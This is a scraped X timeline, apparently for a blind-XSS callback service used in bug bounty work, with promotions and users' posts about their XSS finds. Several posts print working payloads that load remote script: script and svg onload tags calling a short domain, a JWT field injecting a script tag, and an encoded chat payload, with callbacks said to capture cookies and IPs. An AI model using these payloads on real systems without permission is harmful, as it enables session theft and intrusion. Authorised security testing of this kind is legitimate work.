@omer_ckaplan Hello, if this is abuse, please use the contact page on the website.
English
XSS Report
67 posts
XSS Report
@XssReport
The official X account for the https://t.co/aVdNMc0ZRW project. Please use the link on the website as a contact
Katılım Ocak 2023
135 Takip Edilen858 Takipçiler
Daha uygulamanın kırkı çıkmadı kardeşim, azıcık sakin.
a failed attempt. xss.report/c/ellymichaell
@XssReport
Türkçe
they didn't like us :( the XSS v8 researchers are sad.
Ivan at Wallarm / API security solution@d0znpp
Looking for security researcher with great public profile. Remote. API / AI exploits focus on novel techniques. No XSSers please ;) reply here or DM. Please repost
English
XSS Report retweetledi
@OreoB1scuit @Freyxfi @intigriti Th victim is the admin page which is vulnerable to xss if it is vulnerable to xss a notification comes (containing the cookie, Dom elememts,ip,the website and path) if you use an online platform like xss.report for the payloads this is blind xss by the way
English
XSS Report retweetledi
You can easily test your XSS payloads with this 3-character domain name.
<script src='//㉛.st'>
<svg/onload=import('//㉛.st')>
#xss @xssreport
English
Users who have obtained VIP access for testing can now use a 4-character domain name, excluding the username.
You will be able to access more with the additional features we will be introducing soon.
We have special surprises coming soon that we will be announcing.
XSS Report@XssReport
Our 5-character domain is now open to select users! Only 5 slots left. Don’t miss, send us a DM! #xss #BugBounty
English
Our 5-character domain is now open to select users! Only 5 slots left. Don’t miss, send us a DM! #xss #BugBounty
English
You know well where the payload is. it's just a click away and it's free. it's not a dream just a click away.
xss.report
Intigriti@intigriti
🔁 Blind XSS: The invisible injection point and delayed execution make them an easily overlooked vulnerability... 🧐 Yet, they still have a severe impact on any organisation! 🤠 In our technical article, we documented our methodology for finding blind XSS vulnerabilities, including a few cool payloads you could try next time you're testing a target for blind XSS! Link in post below! 👇
English
After sending requests, the error logs started reflecting my payload.
1 hour later… I heard the @xssreport Telegram notification sound.
And yes, it triggered.
XSS achieved. 🎯
#bugbounty #infosec #xss
GIF
English
At this point, I thought:
What if these logs are being processed in a private panel? 🤔 So I crafted this JWT payload:
{
"username": "test3rbb'\"><script src=xss.report/c/0></script>",
"guid": "bd874709-aac7-485a-a46d-6e33964ea930",
"iat": 1754042605
}
English
🚨 Sharing an unbelievable XSS scenario.
Why? Because @XSSReport users know XSS is not just an alert(1), it's an art.
One of our followers analyzed the architecture, studied the attack surface, and came up with this 👇
English
English
@XssReport Hello, wouldn't it be great if there was a bulk delete feature?
English
XSS Report retweetledi
🧪 Unsure where your XSS payload is firing?
It’s not always obvious from the source…
🎯 Use the Custom Parameter feature to isolate and test input fields (like "name", "email", etc.) directly.
Visualize it. Confirm it. Exploit it.
👉 xss.report
#BugBounty #XSS
English
XSS Report retweetledi
🚨 Jai Shri Ram 🙏
Just secured a $100 bounty!
Bug Types:
1.Blind xss in chat inbox payload used
'%22%3E%3Cscript%20src=xss.report/c/milanjain%3E…
#CyberSecurity #BugBounty #prerna #EthicalHacking #SecurityResearcher #Hacker #BugHunter #InfoSec #Reward #Exploit #ServerSecurity
English